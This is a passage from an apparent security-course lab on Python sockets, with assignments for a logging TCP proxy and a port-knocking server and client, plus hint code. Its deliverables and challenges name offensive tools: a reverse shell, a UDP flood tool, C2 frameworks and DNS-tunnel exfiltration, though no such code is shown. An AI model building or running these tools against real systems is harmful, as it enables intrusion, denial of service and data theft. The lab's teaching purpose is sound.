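        # Drop arrivals that have fallen out of the sliding window
        while self._arrivals and timestamp - self._arrivals[0] > self.window:
            self._arrivals.popleft()
        return len(self._arrivals) / self.window > self.threshold_pps


if __name__ == "__main__":
    monitor = PacketRateMonitor(threshold_pps=5)
    for i in range(8):
        alert = monitor.record(i * 0.1)     # simulated arrivals, 10 per second
        print(f"packet {i + 1}: alert={alert}")
```

In a real listener, record(time.monotonic()) would be called after each recvfrom().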

Part 3: Simple Network Proxy (35 minutes)

Objective: Build a TCP proxy to intercept and inspect network traffic.

Requirements:

  1. Create tcp_proxy.py that:
    • Accepts local port and remote host:port as arguments
    • Forwards all traffic between client and remote server
    • Logs all traffic (hex dump or printable text)
    • Optionally modifies traffic (e.g., replace strings)
  2. Test with HTTP traffic (proxy HTTP requests to a website)
  3. Demonstrate traffic inspection (print requests/responses)

Success Criteria:

  • Proxy successfully forwards traffic
  • Log shows client requests and server responses
  • Can intercept HTTP GET/POST requests
  • Optional: Modify traffic in transit
Hint: Hex Dump Function
def hexdump(data, length=16):
    """
    Print hex dump of binary data.
    """
    result = []

    for i in range(0, len(data), length):
        chunk = data[i:i+length]

        # Hex representation
        hex_str = ' '.join(f'{b:02x}' for b in chunk)

        # ASCII representation (replace non-printable with '.')
        ascii_str = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)

        result.append(f'{i:04x}  {hex_str:<{length*3}}  {ascii_str}')

    return '\n'.join(result)


# Usage
data = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
print(hexdump(data))

Part 4: Port Knocking Implementation (30 minutes)

Objective: Implement port knocking - a security technique where ports open only after a sequence of connection attempts.

Requirements:

  1. Create port_knock_server.py:
    • Listens for connection attempts on multiple ports
    • Requires correct sequence (e.g., knock 1000, 2000, 3000 in order)
    • Opens protected port (e.g., SSH on 22) only after correct sequence
    • Resets sequence on timeout or wrong port
  2. Create port_knock_client.py:
    • Sends knock sequence to server
    • Waits between knocks
    • Connects to protected port after sequence

Success Criteria:

  • Server detects correct knock sequence
  • Protected port opens only after valid sequence
  • Sequence resets on timeout or error
  • Client successfully connects after knocking
Hint: Sequence Tracking
import time

class PortKnockServer:
    def __init__(self, sequence):
        """
        Args:
            sequence: List of ports in correct order (e.g., [1000, 2000, 3000])
        """
        self.sequence = sequence
        self.client_states = {}  # {ip: (current_step, last_knock_time)}
        self.timeout = 10  # seconds

    def process_knock(self, client_ip, port):
        """
        Process knock attempt from client.

        Returns:
            True if sequence complete, False otherwise
        """
        now = time.time()

        # Get client state
        if client_ip in self.client_states:
            step, last_time = self.client_states[client_ip]

            # Check timeout
            if now - last_time > self.timeout:
                print(f"[!] {client_ip}: Sequence timeout, resetting")
                step = 0
        else:
            step = 0

        # Check if port matches expected sequence
        if port == self.sequence[step]:
            step += 1
            print(f"[*] {client_ip}: Correct knock {step}/{len(self.sequence)}")

            # Sequence complete?
            if step == len(self.sequence):
                print(f"[✓] {client_ip}: Sequence complete! Opening protected port")
                # pop() avoids a KeyError when the sequence has only one port
                self.client_states.pop(client_ip, None)
                return True

            # Update state
            self.client_states[client_ip] = (step, now)
        else:
            print(f"[!] {client_ip}: Wrong port {port}, expected {self.sequence[step]}")
            if client_ip in self.client_states:
                del self.client_states[client_ip]

        return False
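
The client side of port knocking can be sketched as a series of short connection attempts. This is an illustration under assumptions: send_knocks is an invented name, and it assumes the server counts a TCP connection attempt as a knock, whether or not the port accepts it.

```python
import socket
import time


def send_knocks(host: str, ports: list[int], delay: float = 0.5,
                timeout: float = 1.0) -> list[bool]:
    """Attempt a TCP connection to each port in order.

    Returns one bool per port: True if the connection was accepted.
    """
    results = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results.append(True)
        except OSError:
            # Refused or timed out. This can be normal: some knock servers
            # only observe the attempt and never accept the connection.
            results.append(False)
        time.sleep(delay)               # wait between knocks
    return results


if __name__ == "__main__":
    # Lab-only example against the sequence used in the requirements
    print(send_knocks("127.0.0.1", [1000, 2000, 3000]))
```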
🎯 Lab Complete! You've built foundational network tools used in offensive/defensive security. These skills enable you to understand attack vectors, build custom C2 frameworks, and develop network defenses.

📤 Deliverables:

  • reverse_shell.py - Reverse shell client and listener
  • udp_flood.py - UDP flood tool with monitoring
  • tcp_proxy.py - Network traffic proxy with logging
  • port_knock_server.py + port_knock_client.py - Port knocking implementation
  • Screenshots of each tool working

Additional Resources

Practice Challenges

  • Build a multi-client chat server (like IRC)
  • Create a simple port scanner using raw sockets
  • Implement a basic VPN tunnel (encrypt traffic between client/server)
  • Build a DNS tunnel for data exfiltration (educational)

Key Takeaways

  • ✅ Sockets are the foundation of all network communication
  • ✅ TCP provides reliable, ordered delivery (use for critical data)
  • ✅ UDP is fast but unreliable (use for speed-critical applications)
  • ✅ Always handle network errors and timeouts gracefully
  • ✅ Non-blocking sockets with select() enable concurrent handling
  • ✅ The struct module is essential for binary protocol work
  • ✅ Reverse shells are common malware/backdoor mechanisms
  • ✅ Understanding attack tools helps build better defenses
  • ⚠️ Never use offensive tools without authorization

Week 05 Quiz

Test your understanding of network programming basics in Python.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.
